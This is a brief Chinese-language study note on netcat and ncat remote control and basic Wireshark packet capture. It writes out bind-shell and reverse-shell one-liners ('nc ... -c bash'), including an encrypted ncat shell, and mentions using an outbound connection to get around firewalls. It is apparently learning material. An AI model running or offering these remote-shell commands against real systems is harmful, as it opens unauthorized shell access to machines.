ncat 可以实现加密传输;
一般防火墙都会禁止远程连接,所以可以通过受控段主动提供bas
man nc(系统软件调用手册)(不同系统的nc使用方法不同)
wireshark 会有个权限的报错,直接跳过就可以。
nc远程控制
正向
A:nc -lp 333 -c bash 被控制方 服务器
B: nc -nv 1.1.1.1 333 控制方 客户端
反向
A: nc -lp 333 控制方 客户端
B:nc -nv 1.1.1.1 333 -c bash 被控制方 服务器
init 6重启
注意:windows用户把bash改成cmd
缺点
传输信息不加密,容易被中间人劫持
缺乏身份验证
ncat包含于nmap工具包中,可以实现管道加密
A: ncat -c bash --allow 192.168.1.119 -vnl 333 --ssl 给出shell,指定来源ip并加密
B: ncat -nv 192.168.1.115 333 --ssl 链接被控制端且给出指定的相应加密方式
各nc版本参数不尽相同
man nc 看nc的用户手册,别的也可以看
wireshark抓包嗅探协议分析
实际抓包是靠抓包引擎而不是wireshark
引擎 libpcap9——linux winpcap10——windows
靠wireshark解码数据包
混杂模式 只要经过的数据包就抓
抓包筛选器 capture fiter指定参数来过滤包,只抓什么包
使用流程 选择网卡-start
保存数据包 停止抓包 file sava 选择pcap格式与其他抓包软件兼容性好
首选项 pre。。。。自定义wtreshark
显示筛选器 display fiter